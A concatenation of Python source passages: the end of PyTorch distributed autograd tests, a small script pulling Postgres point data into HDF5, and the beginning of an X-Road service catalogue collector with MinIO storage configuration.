but the process should not crash.
"""
initialize_pg(self.init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
# Can't send sparse tensors over RPC: https://github.com/pytorch/pytorch/issues/30807
return grad_map[embedding.weight].to_dense()
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad.to_dense(), remote_grad)
@classmethod
def _mixed_requires_grad(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
@dist_init
def test_mixed_requires_grad(self):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=False)
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad, t1, t2
)
self.assertEqual(t1 * t2, ret)
dist_autograd.backward(context_id, [ret.sum()])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
# Call custom function in middle of backward pass to ensure all
# nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
# Need atleast one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
# only have `num_current_backward_passes` and `num_autograd contexts`
self.assertTrue(len(debug_info) == 2)
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
# Verify the gradients are same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
return rpc.rpc_sync(worker_name(dst_rank), torch.matmul, args=(t1, t2))
@dist_init
def test_nested_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
).sum()
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_multiple_backward(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@dist_init
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for a.
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
# check a uses the same buffer
self.assertTrue(p_a == p_g)
# Run backwards multiple times.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
with dist_autograd.context() as context_id:
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = NonContGradFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
p_b = grads[b]._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to verify accumulation.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_grad_copy_sparse_indices_extra_ref(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
static_grad_indices_ref = None
static_grad_values_ref = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
# indices() and values() return views, so holding onto
# references of them would not increment refcount of indices
# and values inside the sparse tensor.
MyFunc.static_grad_indices_ref = grad._indices()
MyFunc.static_grad_values_ref = grad._values()
return grad
a = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
self.assertIsNotNone(MyFunc.static_grad_indices_ref)
self.assertIsNotNone(MyFunc.static_grad_values_ref)
# grad would be stolen, since static_grad_indices_ref and
# static_grad_values_ref are holding onto views and don't bump the
# refcount.
self.assertTrue(p_g == p_a)
@dist_init
def test_post_hooks(self):
self.hook_called_times = 0
def post_hook_add_one(output_grads, input_grads):
self.hook_called_times += 1
return output_grads
def post_hook_add_two(output_grads, input_grads):
self.hook_called_times += 2
return output_grads
t = torch.rand(10, 10, requires_grad=True)
a = t + t
# Register post hooks
accumulate_grad_0 = a.grad_fn.next_functions[0][0]
accumulate_grad_0.register_hook(post_hook_add_one)
accumulate_grad_0.register_hook(post_hook_add_two)
accumulate_grad_1 = a.grad_fn.next_functions[1][0]
accumulate_grad_1.register_hook(post_hook_add_two)
with dist_autograd.context() as context_id:
loss = a.sum()
dist_autograd.backward(context_id, [loss])
self.assertEqual(5, self.hook_called_times)
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(1, len(grads))
self.assertTrue(t in grads)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_simple(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
(t1 + t2).sum().backward()
with dist_autograd.context() as context_id:
t3 = t1 + t2
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
t7 = self._exec_func(exec_mode, torch.add, t6.cpu(), t5)
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t7.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_gpu_root(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t6.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
class FaultyAgentDistAutogradTest(RpcAgentTestFixture):
# Reusing a simplified helper function from DistAutogradTest to ensure
# autograd context is successfully cleaned up even when RPCs are failing.
def context_cleanup_test_helper(self, rpc_args, func):
initialize_pg(self.init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_PROCESS_GROUP)
self.assertEqual(self.rpc_backend_options.num_send_recv_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
|
pull.py
|
#!/usr/bin/env python
'''Pull data from database to .h5 storage.'''
# Assuming our points tables have the following schema
# CREATE TABLE points (
# x INTEGER
# , y INTEGER
# , z INTEGER
# , value FLOAT
# );
# We have two database points_pre and points_post
import psycopg2
from psycopg2.extras import DictCursor
from pandas import DataFrame, HDFStore
from threading import Thread
def cursor(step):
'''Return a DictCursor connected to step=pre/post database.'''
conn = psycopg2.connect(database='points_{}'.format(step))
return conn.cursor(cursor_factory=DictCursor)
if __name__ == '__main__':
pre_cursor = cursor('pre')
post_cursor = cursor('post')
sql = 'SELECT x, y, z, value FROM points'''
# Get data in two threads to speed things up
pre_t = Thread(target=pre_cursor.execute, args=(sql,))
pre_t.start()
post_t = Thread(target=post_cursor.execute, args=(sql,))
post_t.start()
pre_t.join()
post_t.join()
# Create data frames
pre = DataFrame.from_records([dict(row) for row in pre_cursor])
post = DataFrame.from_records([dict(row) for row in post_cursor])
# Store data frame in HDF5 data store
store_file = 'points.h5'
store = HDFStore(store_file)
store['pre'] = pre
store['post'] = post
store.flush()
print('Data stored at {}'.format(store_file))
|
catalogue_collector.py
|
#!/usr/bin/env python3
"""This is a module for collection of X-Road services information."""
import queue
from threading import Thread, Event, Lock
from datetime import datetime, timedelta
from io import BytesIO
import argparse
import hashlib
import json
import logging.config
import os
import re
import shutil
import sys
import time
import urllib.parse as urlparse
import urllib3
from minio import Minio
from minio.error import NoSuchKey
import xrdinfo
# TODO: Refactor to use os.path.join instead of '{}{}' and '{}/{}' for path joining
# Use common path for files params['path'], params['minio_path'] -> params['cat_path']
# Default timeout for HTTP requests
DEFAULT_TIMEOUT = 5.0
# Do not use threading by default
DEFAULT_THREAD_COUNT = 1
DEFAULT_WSDL_REPLACES = [
# [Pattern, Replacement]
# Example:
# "Genereerimise aeg: 22.03.2019 08:00:30"
# [
# 'Genereerimise aeg: \\d{2}\\.\\d{2}\\.\\d{4} \\d{2}:\\d{2}:\\d{2}',
# 'Genereerimise aeg: DELETED'
# ]
]
# This logger will be used before loading of logger configuration
DEFAULT_LOGGER = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format': '%(asctime)s - %(threadName)s - %(levelname)s: %(message)s'
},
},
'handlers': {
'default': {
'level': 'WARNING',
'formatter': 'standard',
'class': 'logging.StreamHandler',
'stream': 'ext://sys.stderr',
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': 'WARNING',
'propagate': True
},
'catalogue-collector': {
'handlers': ['default'],
'level': 'WARNING',
'propagate': False
},
}
}
# Application will use this logger
LOGGER = logging.getLogger('catalogue-collector')
def identifier_path(items):
"""Convert identifier in form of list/tuple to string representation
of filesystem path. We assume that no symbols forbidden by
filesystem are used in identifiers.
"""
return '/'.join(items)
def load_config(config_file):
"""Load configuration from JSON file"""
try:
with open(config_file, 'r') as conf:
return json.load(conf)
except IOError as err:
LOGGER.error('Cannot load configuration file "%s": %s', config_file, str(err))
return None
except json.JSONDecodeError as err:
LOGGER.error('Invalid JSON configuration file "%s": %s', config_file, str(err))
return None
def configure_logging(config):
"""Configure logging based on loaded configuration"""
if 'logging-config' in config:
logging.config.dictConfig(config['logging-config'])
LOGGER.info('Logger configured')
def set_params(config):
"""Configure parameters based on loaded configuration"""
params = {
'path': None,
'minio': None,
'minio_access_key': None,
'minio_secret_key': None,
'minio_secure': True,
'minio_ca_certs': None,
'minio_bucket': 'catalogue',
'minio_path': '',
'url': None,
'client': None,
'instance': None,
'timeout': DEFAULT_TIMEOUT,
'verify': False,
'cert': None,
'thread_cnt': DEFAULT_THREAD_COUNT,
'wsdl_replaces': DEFAULT_WSDL_REPLACES,
'excluded_member_codes': [],
'excluded_subsystem_codes': [],
'filtered_hours': 24,
'filtered_days': 30,
'filtered_months': 12,
'cleanup_interval': 7,
'days_to_keep': 30,
'work_queue': queue.Queue(),
'results': {},
'results_lock': Lock(),
'shutdown': Event()
}
if 'output_path' in config:
params['path'] = config['output_path']
LOGGER.info('Configuring "path": %s', params['path'])
if 'minio_url' in config:
params['minio'] = config['minio_url']
LOGGER.info('Configuring "minio_url": %s', params['minio'])
if 'minio_access_key' in config:
params['minio_access_key'] = config['minio_access_key']
LOGGER.info('Configuring "minio_access_key": %s', params['minio_access_key'])
if 'minio_secret_key' in config:
params['minio_secret_key'] = config['minio_secret_key']
LOGGER.info('Configuring "minio_secret_key": <password hidden>')
if 'minio_secure' in config:
params['minio_secure'] = config['minio_secure']
LOGGER.info('Configuring "minio_secure": %s', params['minio_secure'])
if 'minio_ca_certs' in config:
params['minio_ca_certs'] = config['minio_ca_certs']
LOGGER.info('Configuring "minio_ca_certs": %s', params['minio_ca_certs'])
if 'minio_bucket' in config:
params['minio_bucket'] = config['minio_bucket']
LOGGER.info('Configuring "minio_bucket": %s', params['minio_bucket'])
if 'minio_path' in config:
params['minio_path'] = config['minio_path']
params['minio_path'].strip('/')
if params['minio_path']:
params['minio_path'] += '/'
LOGGER.info('Configuring "minio_path": %s', params['minio_path'])
if params['path'] is None and params['minio'] is None:
LOGGER.error('Configuration error: No output path or MinIO URL are provided')
return None
if 'server_url' in config:
params['url'] = config['server_url']
LOGGER.info('Configuring "url": %s', params['url'])
else:
LOGGER.error('Configuration error: Local Security Server URL is not provided')
return None
if 'client' in config and len(config['client']) in (3, 4):
params['client'] = config['client']
LOGGER.info('Configuring "client": %s', params['client'])
else:
LOGGER.error(
'Configuration error: Client identifier is incorrect. Expecting list of identifiers. '
'Example: ["INST", "CLASS", "MEMBER_CODE", "MEMBER_CLASS"])')
return None
if 'instance' in config and config['instance']:
params['instance'] = config['instance']
LOGGER.info('Configuring "instance": %s', params['instance'])
if 'timeout' in config and config['timeout'] > 0.0:
params['timeout'] = config['timeout']
LOGGER.info('Configuring "timeout": %s', params['timeout'])
if 'server_cert' in config and config['server_cert']:
params['verify'] = config['server_cert']
LOGGER.info('Configuring "verify": %s', params['verify'])
if 'client_cert' in config and 'client_key' in config \
and config['client_cert'] and config['client_key']:
params['cert'] = (config['client_cert'], config['client_key'])
LOGGER.info('Configuring "cert": %s', params['cert'])
if 'thread_count' in config and config['thread_count'] > 0:
params['thread_cnt'] = config['thread_count']
LOGGER.info('Configuring "thread_cnt": %s', params['thread_cnt'])
if 'wsdl_replaces' in config:
params['wsdl_replaces'] = config['wsdl_replaces']
LOGGER.info('Configuring "wsdl_replaces": %s', params['wsdl_replaces'])
if 'excluded_member_codes' in config:
params['excluded_member_codes'] = config['excluded_member_codes']
LOGGER.info('Configuring "excluded_member_codes": %s', params['excluded_member_codes'])
if 'excluded_subsystem_codes' in config:
params['excluded_subsystem_codes'] = config['excluded_subsystem_codes']
LOGGER.info(
'Configuring "excluded_subsystem_codes": %s', params['excluded_subsystem_codes'])
if 'filtered_hours' in config and config['filtered_hours'] > 0:
params['filtered_hours'] = config['filtered_hours']
LOGGER.info('Configuring "filtered_hours": %s', params['filtered_hours'])
if 'filtered_days' in config and config['filtered_days'] > 0:
params['filtered_days'] = config['filtered_days']
LOGGER.info('Configuring "filtered_days": %s', params['filtered_days'])
if 'filtered_months' in config and config['filtered_months'] > 0:
params['filtered_months'] = config['filtered_months']
LOGGER.info('Configuring "filtered_months": %s', params['filtered_months'])
if 'cleanup_interval' in config and config['cleanup_interval'] > 0:
params['cleanup_interval'] = config['cleanup_interval']
LOGGER.info('Configuring "cleanup_interval": %s', params['cleanup_interval'])
if 'days_to_keep' in config and config['days_to_keep'] > 0:
params['days_to_keep'] = config['days_to_keep']
LOGGER.info('Configuring "days_to_keep": %s', params['days_to_keep'])
if params['path'] is not None and params['minio'] is not None:
LOGGER.warning('Saving to both local and MinIO storage is not supported')
if params['minio']:
LOGGER.info('Using MinIO storage')
else:
LOGGER.info('Using local storage')
LOGGER.info('Configuration done')
return params
def prepare_minio_client(params):
"""Creates minio client and stores that in params"""
if params['minio_ca_certs']:
http_client = urllib3.PoolManager(
ca_certs=params['minio_ca_certs']
)
params['minio_client'] = Minio(
params['minio'],
access_key=params['minio_access_key'],
secret_key=params['minio_secret_key'],
secure=params['minio_secure'],
http_client=http_client)
else:
params['minio_client'] = Minio(
params['minio'],
access_key=params['minio_access_key'],
secret_key=params['minio_secret_key'],
secure=params['minio_secure'])
def make_dirs(path):
"""Create directories if they do not exist"""
try:
os.makedirs(path)
except OSError:
pass
if not os.path.exists(path):
LOGGER.error('Cannot create directory "%s"', path)
return False
return True
def hash_wsdls(path, params):
"""Find hashes of all WSDL's in directory"""
hashes = {}
if params['minio']:
for obj in params['minio_client'].list_objects(
params['minio_bucket'], prefix=path, recursive=False):
file_name = obj.object_name[len(path):]
search_res = re.search('^(\\d+)\\.wsdl$', file_name)
if search_res:
wsdl_object = params['minio_client'].get_object(
params['minio_bucket'], '{}{}'.format(path, file_name))
hashes[file_name] = hashlib.md5(wsdl_object.data).hexdigest()
else:
for file_name in os.listdir(path):
search_res = re.search('^(\\d+)\\.wsdl$', file_name)
if search_res:
# Reading as bytes to avoid line ending conversion
with open('{}/{}'.format(path, file_name), 'rb') as wsdl_file:
wsdl = wsdl_file.read()
hashes[file_name] = hashlib.md5(wsdl).hexdigest()
return hashes
def get_wsdl_hashes(path, params):
"""Get WSDL hashes in a directory"""
if params['minio']:
try:
wsdl_hashes_file = params['minio_client'].get_object(
params['minio_bucket'], '{}_wsdl_hashes'.format(path))
hashes = json.loads(wsdl_hashes_file.data.decode('utf-8'))
except NoSuchKey:
hashes = hash_wsdls(path, params)
